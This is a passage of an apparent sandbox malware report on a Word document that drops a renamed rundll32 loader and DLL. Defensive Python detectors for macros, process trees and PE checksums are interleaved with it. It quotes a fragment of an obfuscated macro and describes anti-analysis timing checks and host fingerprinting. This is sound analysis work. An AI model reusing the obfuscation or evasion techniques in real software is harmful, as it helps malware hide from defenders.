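    Set o1 = CallByName((lOePrNSeOnF7("o93TBY150D")), lOePrNSeOnF7("gEzmn7rG"), VbGet, lOePrNSeOnF7("mVwBL4NuTS"))
    Set o2 = CallByName((o1), lOePrNSeOnF7("SwjpO4CYqFz"), VbGet, o2)
    Set o3 = CallByName((o2), lOePrNSeOnF7("wmubexAZc"), VbGet, o3)
End Sub
'''

# Auto-execute entry points that run without the user calling a macro.
AUTOEXEC = re.compile(
    r'\bSub\s+(Document_Open|Document_Close|AutoOpen|AutoClose|AutoExec|Workbook_Open)\b', re.I)
# Declare [PtrSafe] Function|Sub <name> Lib "<dll>" [Alias "<export>"]
DECLARE = re.compile(
    r'\bDeclare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+\w+\s+Lib\s+"([^"]+)"'
    r'(?:\s+Alias\s+"([^"]+)")?', re.I)
CALLBYNAME = re.compile(r'\bCallByName\s*\(', re.I)
# Any identifier invoked with exactly one string literal: a string-decoder candidate.
STR_CALL = re.compile(r'\b([A-Za-z_]\w*)\s*\(\s*"([^"]*)"\s*\)')

# Exports that change page protections or write/execute memory from VBA (example's own list).
MEMORY_APIS = {'virtualprotect', 'virtualalloc', 'rtlmovememory', 'createthread',
               'writeprocessmemory', 'ntprotectvirtualmemory', 'heapcreate'}

WEIGHTS = {'autoexec': 2, 'declare': 1, 'memory_api': 3,
           'callbyname': 2, 'string_decoder': 3}


def looks_encoded(s):
    """Opaque literal: 6+ chars, no spaces, mixed case plus digits."""
    return (len(s) >= 6 and ' ' not in s and any(c.isdigit() for c in s)
            and any(c.islower() for c in s) and any(c.isupper() for c in s))


def triage_vba(src):
    """Score one VBA module; returns (score, [(tag, detail), ...])."""
    findings = []
    for m in AUTOEXEC.finditer(src):
        findings.append(('autoexec', m.group(1)))
    for m in DECLARE.finditer(src):
        dll, alias = m.group(1).lower(), (m.group(2) or '').lower()
        findings.append(('declare', f'{dll}!{alias or "<no alias>"}'))
        if alias in MEMORY_APIS:
            findings.append(('memory_api', alias))
    n_cbn = len(CALLBYNAME.findall(src))
    if n_cbn:
        findings.append(('callbyname', f'{n_cbn} late-bound calls'))
    # One function fed many opaque literals is the usual shape of a string decoder.
    calls = Counter(name for name, arg in STR_CALL.findall(src) if looks_encoded(arg))
    for name, n in calls.items():
        if n >= 3:
            findings.append(('string_decoder', f'{name} called {n} times'))
    score = sum(WEIGHTS[tag] for tag, _ in findings)
    return score, findings


if __name__ == '__main__':
    score, findings = triage_vba(SAMPLE_MACRO)
    print(f'score={score}')
    for tag, detail in findings:
        print(f'  {tag:15} {detail}')
```

The scorer takes module source text, so run olevba or a similar extractor on the document first. CallByName with VbGet on decoded member names is what lets the macro reach objects and properties without their names ever appearing in the source, which is why CallByName earns weight here even though it is legitimate VBA; the VirtualProtect declaration is the stronger signal, since a document macro has no benign reason to change page protections.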
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeCode function: 4_2_00761A33 NtOpenProcessToken,NtClose,4_2_00761A33
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeCode function: 4_2_00761203 HeapSetInformation,NtSetInformationProcess,lstrlenW,LocalAlloc,SetErrorMode,DestroyWindow,FreeLibrary,LocalFree,LocalFree,ExitProcess,4_2_00761203
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeCode function: 4_2_007619E3 NtOpenProcessToken,NtSetInformationToken,NtClose,4_2_007619E3
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeCode function: 4_2_00761A8C NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,4_2_00761A8C
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF7535FE6 NtCreateSection,NtMapViewOfSection,5_2_000007FEF7535FE6
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF7535FF9 NtCreateSection,5_2_000007FEF7535FF9
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,5_2_000000018000108C
    Source: ~WRF{27A0920F-83BA-451C-A370-247C29EA575C}.tmp.1.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: ~DF612CB1A14F491B4E.TMP.1.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: loader_p3_dll_64_n3_crypt_x64_asm_clone_n14[1].dll.1.drStatic PE information: No import functions for PE file found
    Source: y875E.tmp.dll.1.drStatic PE information: No import functions for PE file found
    Source: r9093.tmp.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: r9093.tmp.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: r9093.tmp.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: courtesyautomotivedoc08.11.docOLE indicator, VBA macros: true
    Source: ~DF612CB1A14F491B4E.TMP.1.drOLE indicator, VBA macros: true
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\r9093.tmp.exe 5AD3C37E6F2B9DB3EE8B5AEEDC474645DE90C66E3D95F8620C48102F1EBA4124
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
    Source: courtesyautomotivedoc08.11.docVirustotal: Detection: 26%
    Source: courtesyautomotivedoc08.11.docReversingLabs: Detection: 17%
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Users\user\AppData\Local\Temp\r9093.tmp.exe "C:\Users\user\AppData\Local\Temp\r9093.tmp.exe" "C:\Users\user\AppData\Local\Temp\y875E.tmp.dll",#1
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Local\Temp\r9093.tmp.exe" "C:\Users\user\AppData\Local\Temp\y875E.tmp.dll",#1
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Users\user\AppData\Local\Temp\r9093.tmp.exe "C:\Users\user\AppData\Local\Temp\r9093.tmp.exe" "C:\Users\user\AppData\Local\Temp\y875E.tmp.dll",#1Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Local\Temp\r9093.tmp.exe" "C:\Users\user\AppData\Local\Temp\y875E.tmp.dll",#1Jump to behavior
    Source: courtesyautomotivedoc08.11.LNK.1.drLNK file: ..\..\..\..\..\Desktop\courtesyautomotivedoc08.11.doc
    Source: courtesyautomotivedoc08.11.docOLE indicator, Word Document stream: true
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$urtesyautomotivedoc08.11.docJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR6D91.tmpJump to behavior
    Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@5/14@2/2
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeCode function: 4_2_007614BD LoadLibraryExW,RtlImageNtHeader,SetProcessDEPPolicy,GetLastError,FormatMessageW,4_2_007614BD
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Local\Temp\r9093.tmp.exe" "C:\Users\user\AppData\Local\Temp\y875E.tmp.dll",#1
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeCommand line argument: RunDLL4_2_00761203
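The process tree in the entries above is the part of this report most worth turning into a detection: WINWORD.EXE writes r9093.tmp.exe and y875E.tmp.dll to the user's Temp directory, runs r9093.tmp.exe with a rundll32-style "<dll>",#1 argument, and that binary, which carries the rundll32.pdb debug string and the RunDLL argument string, starts the real C:\Windows\System32\rundll32.exe. The following is an added example, not code from the report or from Joe Sandbox: Python rules evaluated over constructed Sysmon-style process-creation events that mirror that tree. The OriginalFileName value RUNDLL32.EXE on the second event is an assumption, consistent with the pdb string but not shown in the report; the rule names are the example's own.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events (Sysmon Event ID 1 field names) that mirror
# the process tree in this report. OriginalFileName on the second event is an
# assumption: the report only shows the rundll32.pdb debug string and the RunDLL
# argument string for r9093.tmp.exe, not its version resource.
EVENTS = [
    {'ParentImage': None,
     'Image': r'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE',
     'CommandLine': r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding'},
    {'ParentImage': r'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE',
     'Image': r'C:\Users\user\AppData\Local\Temp\r9093.tmp.exe',
     'CommandLine': r'"C:\Users\user\AppData\Local\Temp\r9093.tmp.exe" "C:\Users\user\AppData\Local\Temp\y875E.tmp.dll",#1',
     'OriginalFileName': 'RUNDLL32.EXE'},
    {'ParentImage': r'C:\Users\user\AppData\Local\Temp\r9093.tmp.exe',
     'Image': r'C:\Windows\System32\rundll32.exe',
     'CommandLine': r'"C:\Users\user\AppData\Local\Temp\r9093.tmp.exe" "C:\Users\user\AppData\Local\Temp\y875E.tmp.dll",#1'},
    {'ParentImage': r'C:\Windows\explorer.exe',
     'Image': r'C:\Windows\System32\notepad.exe',
     'CommandLine': r'"C:\Windows\System32\notepad.exe" C:\Users\user\Documents\notes.txt'},
]

OFFICE = {'winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe', 'msaccess.exe'}
# "<path>.dll",#<ordinal>  or  <path>.dll,<ExportName>: how rundll32 names its entry point
RUNDLL_ARGS = re.compile(r'\.dll"?\s*,\s*(?:#\d+|[A-Za-z_]\w*)\b', re.I)
# Per-user scratch locations the report shows the dropper and DLL landing in.
USER_TEMP = ('\\appdata\\local\\temp\\', '\\content.ie5\\')


def basename(path):
    return PureWindowsPath(path).name.lower() if path else ''


def in_user_temp(text):
    t = text.lower()
    return any(marker in t for marker in USER_TEMP)


def evaluate(event):
    """Names of the rules one process-creation event triggers."""
    hits = []
    parent = basename(event.get('ParentImage'))
    name = basename(event['Image'])
    cmd = event.get('CommandLine', '')
    if parent in OFFICE and in_user_temp(event['Image']):
        hits.append('office_spawns_temp_binary')
    if RUNDLL_ARGS.search(cmd):
        if name != 'rundll32.exe':
            hits.append('rundll32_style_args_from_renamed_binary')
        if in_user_temp(cmd):
            hits.append('dll_loaded_from_user_temp')
    original = (event.get('OriginalFileName') or '').lower()
    if original and original != name:
        hits.append(f'image_name_mismatch:{original}')
    return hits


def flagged(events):
    """(image basename, hits) for every event that triggered at least one rule."""
    out = []
    for ev in events:
        hits = evaluate(ev)
        if hits:
            out.append((basename(ev['Image']), hits))
    return out


if __name__ == '__main__':
    for image, hits in flagged(EVENTS):
        print(image, '->', ', '.join(hits))
```

The renamed-binary rule fires because the argument shape belongs to rundll32 while the image name does not; it needs only the command line, which every process-creation source records. The mismatch rule needs telemetry that records the version-resource name (Sysmon's OriginalFileName does); the report itself does not include that field, which is why the value is an assumption here. The benign notepad event and the WINWORD start itself trigger nothing, so the rules can be run over a whole log without keying on the Office process alone.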
    Source: courtesyautomotivedoc08.11.docOLE document summary: title field not present or empty
    Source: courtesyautomotivedoc08.11.docOLE document summary: author field not present or empty
    Source: courtesyautomotivedoc08.11.docOLE document summary: edited time not present or 0
    Source: ~WRF{27A0920F-83BA-451C-A370-247C29EA575C}.tmp.1.drOLE document summary: title field not present or empty
    Source: ~WRF{27A0920F-83BA-451C-A370-247C29EA575C}.tmp.1.drOLE document summary: author field not present or empty
    Source: ~WRF{27A0920F-83BA-451C-A370-247C29EA575C}.tmp.1.drOLE document summary: edited time not present or 0
    Source: ~DF612CB1A14F491B4E.TMP.1.drOLE document summary: title field not present or empty
    Source: ~DF612CB1A14F491B4E.TMP.1.drOLE document summary: author field not present or empty
    Source: ~DF612CB1A14F491B4E.TMP.1.drOLE document summary: edited time not present or 0
    Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: courtesyautomotivedoc08.11.docInitial sample: OLE zip file path = docProps/custom.xml
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: courtesyautomotivedoc08.11.docStatic file information: File size 2351271 > 1048576
    Source: Binary string: rundll32.pdb source: r9093.tmp.exe, r9093.tmp.exe, 00000004.00000000.924895395.0000000000761000.00000020.00000001.01000000.00000003.sdmp, r9093.tmp.exe, 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, r9093.tmp.exe.1.dr
    Source: ~WRF{27A0920F-83BA-451C-A370-247C29EA575C}.tmp.1.drInitial sample: OLE indicators vbamacros = False
    Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeCode function: 4_2_007619CA push ecx; ret 4_2_007619DD
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF7538BC2 push rax; ret 5_2_000007FEF7538BDE
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF753610E push rdx; ret 5_2_000007FEF753611B
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,5_2_000000018000108C
    Source: loader_p3_dll_64_n3_crypt_x64_asm_clone_n14[1].dll.1.drStatic PE information: real checksum: 0x59d91 should be: 0x62962
    Source: y875E.tmp.dll.1.drStatic PE information: real checksum: 0x59d91 should be: 0x62962
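Two static indicators in this report point the same way: the dropped DLLs have no import directory ("No import functions for PE file found") and a PE checksum that does not match (real 0x59d91, expected 0x62962). Together they say the DLL was modified after linking and resolves its APIs at runtime, which matches the LoadLibraryA/GetProcAddress sequence in the rundll32.exe code function listed elsewhere in this report. The following is an added example, not code from the report or from Joe Sandbox: a Python implementation of the PE image checksum and an import-directory check, exercised on a constructed PE32+ skeleton. The skeleton is a parser fixture built inline, not a loadable image.

```python
import struct

PE32, PE32PLUS = 0x10B, 0x20B


def optional_header(data):
    """Offset of the optional header and its magic; raises on a non-PE buffer."""
    if data[:2] != b'MZ':
        raise ValueError('missing MZ signature')
    e_lfanew = struct.unpack_from('<I', data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b'PE\0\0':
        raise ValueError('missing PE signature')
    opt = e_lfanew + 4 + 20                      # after PE\0\0 and the 20-byte COFF header
    magic = struct.unpack_from('<H', data, opt)[0]
    if magic not in (PE32, PE32PLUS):
        raise ValueError(f'unknown optional header magic {magic:#x}')
    return opt, magic


def pe_checksum(data):
    """Recompute the image checksum the way imagehlp's CheckSumMappedFile does:
    ones'-complement sum of all 16-bit words, skipping the CheckSum field itself,
    folded to 16 bits, plus the file length."""
    opt, _ = optional_header(data)
    cs = opt + 64                                # CheckSum sits at +64 in PE32 and PE32+
    total = 0
    n = len(data)
    for i in range(0, n - (n % 2), 2):
        if i == cs or i == cs + 2:
            continue
        total += data[i] | (data[i + 1] << 8)
    if n % 2:
        total += data[-1]
    while total >> 16:                           # end-around carry
        total = (total & 0xFFFF) + (total >> 16)
    return (total + n) & 0xFFFFFFFF


def stored_checksum(data):
    opt, _ = optional_header(data)
    return struct.unpack_from('<I', data, opt + 64)[0]


def with_checksum(data):
    """Copy of data with a correct CheckSum field (what a linker's /RELEASE does)."""
    buf = bytearray(data)
    opt, _ = optional_header(buf)
    struct.pack_into('<I', buf, opt + 64, pe_checksum(buf))
    return bytes(buf)


def import_directory(data):
    """(RVA, size) of data directory 1, the import table; (0, 0) if absent."""
    opt, magic = optional_header(data)
    count_off, dirs_off = (108, 112) if magic == PE32PLUS else (92, 96)
    count = struct.unpack_from('<I', data, opt + count_off)[0]
    if count < 2:
        return (0, 0)
    return struct.unpack_from('<II', data, opt + dirs_off + 8)


def static_indicators(data):
    """The two static indicators this report raises for the dropped DLL."""
    flags = []
    if stored_checksum(data) != pe_checksum(data):
        flags.append('checksum_mismatch')
    rva, size = import_directory(data)
    if rva == 0 or size == 0:
        flags.append('no_import_directory')
    return flags


def build_minimal_pe(import_rva=0, import_size=0):
    """Constructed PE32+ DLL skeleton: headers plus one section of filler bytes.
    It is not loadable; it exists only so the parsers above have something to read."""
    dos = bytearray(b'MZ' + b'\0' * 0x3E)
    struct.pack_into('<I', dos, 0x3C, 0x40)                          # e_lfanew
    coff = struct.pack('<HHIIIHH', 0x8664, 1, 0, 0, 0, 240, 0x2022)  # x64, 1 section, DLL
    opt = bytearray(240)
    struct.pack_into('<H', opt, 0, PE32PLUS)
    struct.pack_into('<Q', opt, 24, 0x180000000)                     # ImageBase
    struct.pack_into('<II', opt, 32, 0x1000, 0x200)                  # section/file alignment
    struct.pack_into('<II', opt, 56, 0x2000, 0x200)                  # SizeOfImage, SizeOfHeaders
    struct.pack_into('<I', opt, 108, 16)                             # NumberOfRvaAndSizes
    struct.pack_into('<II', opt, 112 + 8, import_rva, import_size)   # data directory [1]
    section = struct.pack('<8sIIIIIIHHI', b'.text', 0x200, 0x1000, 0x200, 0x200,
                          0, 0, 0, 0, 0x60000020)
    headers = (bytes(dos) + b'PE\0\0' + coff + bytes(opt) + section).ljust(0x200, b'\0')
    return headers + bytes(range(256)) * 2                           # 0x200 bytes of section data
```

Many legitimately built user-mode binaries ship with CheckSum 0 because the linker fills the field only when asked, so a mismatch on its own is weak; the signal in this report is the nonzero wrong value, which means bytes changed after the linker wrote the field, exactly what a crypter does to a finished DLL. An empty import directory is the companion sign: the loader must then find LoadLibraryA and GetProcAddress itself (by walking the PEB or hashing exports) before it can call anything, and a dynamic trace will show that resolution as the first API activity.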
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\y875E.tmp.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n14[1].dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior (11 identical entries)
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exe  Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe  Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\rundll32.exe  RDTSC instruction interceptor: First address: 0000000180002AE1 second address: 0000000180002B06 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
Source: C:\Windows\System32\rundll32.exe  RDTSC instruction interceptor: First address: 0000000180002B1B second address: 0000000180002B28 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
Reading note: the interceptor disassembles this 64-bit DLL as 32-bit code, so every "dec eax" (byte 0x48) and "dec esp" (byte 0x4C) above is a REX prefix, not a decrement. "dec eax; shl edx, 20h; dec eax; or eax, edx" is shl rdx, 32; or rax, rdx (assembling the 64-bit TSC from EDX:EAX), "dec esp; mov eax, eax" is mov r8, rax (saving the first timestamp), and "dec eax; mov ecx, eax" is mov rcx, rax. The first block is therefore rdtsc; cpuid with eax=1 and ecx=0, all four result registers spilled to the stack; rdtsc, and the second block is a bare rdtsc; rdtsc pair: the measured cost of CPUID and the baseline it is compared against.
Source: C:\Windows\System32\rundll32.exe  Code function: 5_2_0000000180002AC0 SwitchToThread,SwitchToThread (the intercepted rdtsc at 0000000180002AE1 is 0x21 bytes into this function, so the probe yields the CPU twice before measuring)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n14[1].dll
Source: C:\Windows\System32\rundll32.exe  Code function: 5_2_0000000180002174 rdtsc (listed twice in the report)
Source: C:\Windows\System32\rundll32.exe  Code function: 5_2_000000018000133C LoadLibraryA,GetProcAddress,GetAdaptersInfo,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
Source: C:\Windows\System32\rundll32.exe  Code function: 5_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
Source: C:\Windows\System32\rundll32.exe  Code function: 5_2_0000000180001C28 GetComputerNameExW,LookupAccountNameW,GetLastError,GetProcessHeap,HeapAlloc,LookupAccountNameW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
(The three functions above are host fingerprinting: network adapter enumeration, a system information query and a computer-name-to-SID lookup, with the first two resolving their imports at run time through LoadLibraryA/GetProcAddress rather than the import table.)
Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exe  Code function: 4_2_00761189 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess (the Visual C++ runtime's security-failure handler, not sample-specific logic)
